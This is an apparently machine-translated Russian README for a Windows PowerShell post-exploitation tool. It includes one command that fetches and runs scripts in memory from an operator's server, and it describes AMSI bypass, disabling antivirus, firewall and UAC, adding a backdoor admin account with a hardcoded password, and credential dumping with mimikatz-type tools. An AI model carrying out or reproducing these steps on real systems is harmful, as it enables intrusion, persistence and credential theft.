Оболочка инструментов Windows Post-Exploitation.
ВВЕДЕНИЕ
Краткий обзор инструмента, который автоматизирует задачи после эксплуатации.
ФУНКЦИОНАЛЬНОСТЬ
Вы должны сначала установить URL-адрес для остальных функций, а затем загрузить скрипты:
Invoke-Wisp -Url http://<your_server> . memory_load
Убедитесь, что у вас есть права на запись в текущий каталог.
- Система перечисления для повышения привилегий.
escalation
- Ограбление системы после перехода к NT AUTHORITY\SYSTEM.
looting
КОД
Основные возможности программы указаны выше. Однако гораздо больше программа делает за вашей спиной. Код инструмента показан ниже. Возможно, в будущем это изменится, но основная идея останется прежней.
Invoke-Wisp
Функция устанавливает глобальную переменную URL, которая будет использоваться для загрузки. Invoke-Wisp
автоматически использует bypass_amsi
, описанный ниже.
Обход_AMSI
Функция загрузки файла isma.txt
отключает AMSI.dll и, следовательно, Microsoft Defender в памяти PowerShell.
Память_Загрузка
Функция загрузки и загрузки в память сценариев PowerShell. Вы можете добавить сюда свои скрипты, чтобы они загружались одной командой.
Пожалуйста, убедитесь, что вы используете точечный источник функции, когда используете ее для загрузки скрипта в глобальную область. В противном случае скрипты будут загружаться только в области функций и не будут выполняться глобально.
Эскалация
Функция загрузки и запуска в памяти PowerShell escalate.txt
file, которая выполняет ряд команд для перечисления Privilege Escalation и, в конце, напоминает пользователю о нескольких дополнительных ручных проверках.
Укрепление
Функция запущена после эскалации NT AUTHORITY\SYSTEM на этапе грабежа. Загружает и запускает файл fort.txt
в памяти.
Функции:
- Создание каталога
C:/blood
, в котором хранятся все загруженные инструменты. - Отключение антивируса и добавление
C:/blood
в список исключений. - Отключение брандмауэра и UAC.
- Включение RDP и PS-Remoting.
- Добавление нового пользователя
crimson
:ASDqwe123
в группу локальных администраторов и RDP. - Загрузка
mimikatz
,psexec
,procdump
,nmap
,sharphound
,lazagne
,Rubeus
иwinPEAS.exe
.
Мародерство
Функция сначала использует вышеупомянутый Fortification
, а затем загружает и запускает в памяти PowerShell файл loot.txt
file, который выполняет ряд команд для грабежа — по сути, сбрасывает учетные данные.
ЗАКЛЮЧИТЕЛЬНЫЕ СЛОВА
Спасибо за прочтение. Надеюсь, вам понравится инструмент. Если у вас есть какие-либо предложения или вы нашли ошибку, не стесняйтесь вносить свой вклад.